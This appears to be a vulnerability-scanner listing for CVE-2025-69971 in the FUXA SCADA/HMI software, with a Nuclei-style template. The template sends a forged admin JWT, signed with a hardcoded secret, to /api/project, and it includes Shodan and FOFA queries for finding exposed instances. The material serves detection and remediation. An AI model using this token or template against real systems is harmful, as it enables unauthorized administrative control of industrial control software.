FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass
CVE-2025-69971
Verified
Description
FUXA v1.2.7 contains a hardcoded-credentials vulnerability caused by the use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication; exploitation requires no special conditions.
Severity
Critical
CVSS Score
9.8
Exploit Probability
5%
Affected Product
fuxa
Published Date
February 15, 2026
Template Author
trader642
CVE-2025-69971.yaml
id: CVE-2025-69971

info:
  name: FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass
  author: trader642
  severity: critical
  description: |
    FUXA v1.2.7 contains a hardcoded credentials vulnerability caused by use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication, exploit requires no special conditions.
  impact: |
    Remote attackers can bypass authentication and gain full administrative access.
  remediation: |
    Update to the latest version that removes hard-coded credentials.
  reference:
    - https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg
    - https://nvd.nist.gov/vuln/detail/CVE-2025-69971
    - https://github.com/frangoteam/FUXA/blob/master/server/api/jwt-helper.js
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-69971
    epss-score: 0.04529
    epss-percentile: 0.89291
    cwe-id: CWE-321
    cpe: cpe:2.3:a:frangoteam:fuxa:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frangoteam
    product: fuxa
    fofa-query: title="FUXA"
    shodan-query: title:"FUXA"
  tags: cve,cve2025,fuxa,frangoteam,auth-bypass,hardcoded-credentials,jwt,scada,vuln

http:
  - raw:
      - |
        GET /api/project HTTP/1.1
        Host: {{Hostname}}
        x-access-token: eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpZCI6ICJhZG1pbiIsICJncm91cHMiOiBbLTEsIDI1NV0sICJpYXQiOiAxNzAwMDAwMDAwLCAiZXhwIjogMjAwMDAwMDAwMH0.WEOs0b8pyK8Q7IoQtN3fpc0x0KlAKMAm78oPR9zg2Cg

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "\"hmi\"", "\"server\"", "FuxaServer")'
        condition: and
# digest: 4a0a0047304502202993ce9a0e4e89329444b44e18e671b06acab5390f6d2102d3823f98d9e740a0022100902a6a8c7c806ba08e0abe253d505562f62c45ea7e0852fa9c00f3f0fae73ef5:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2025-69971
CWE ID:
CWE-321
Remediation Steps
Update to the latest version that removes hard-coded credentials.